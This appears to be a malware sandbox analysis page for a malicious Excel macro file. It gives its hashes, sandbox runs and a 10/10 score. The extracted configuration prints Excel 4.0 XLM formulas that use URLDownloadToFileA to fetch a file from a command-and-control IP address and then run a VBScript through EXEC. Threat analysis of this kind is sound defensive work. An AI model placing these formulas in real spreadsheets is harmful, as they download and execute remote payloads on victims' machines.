63a58cf7c3369f847b484a0cca7e04c3 | Triage

Submit
Reports

Overview

overview

Static

static

63a58cf7c3...3.xlsm

windows7-x64

63a58cf7c3...3.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

63a58cf7c3369f847b484a0cca7e04c3.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

63a58cf7c3369f847b484a0cca7e04c3.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

63a58cf7c3369f847b484a0cca7e04c3
Size

6KB
MD5

63a58cf7c3369f847b484a0cca7e04c3
SHA1

a12666d72a5e57742c689affbf537850dab35808
SHA256

8494e2b38612f1e096202ea360ee8a34f6640c98893b8182ccc761d78f2b3e40
SHA512

05bbf46320a65582fd781098ee4cb8a02a20f27247e1de9561dd70c84611795c0b6e3b5139d158d6d17156e6575b67ed89c686b9475567bc53eba9f7f1bf70a8
SSDEEP

192:NDSWuScbrA2OmmfRn8UhHFBFYu5b98yfy+6:NRuxM2wt1FY8b98yfy

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

63a58cf7c3369f847b484a0cca7e04c3
.xlsm office2007

© 2018-2025

Terms | Privacy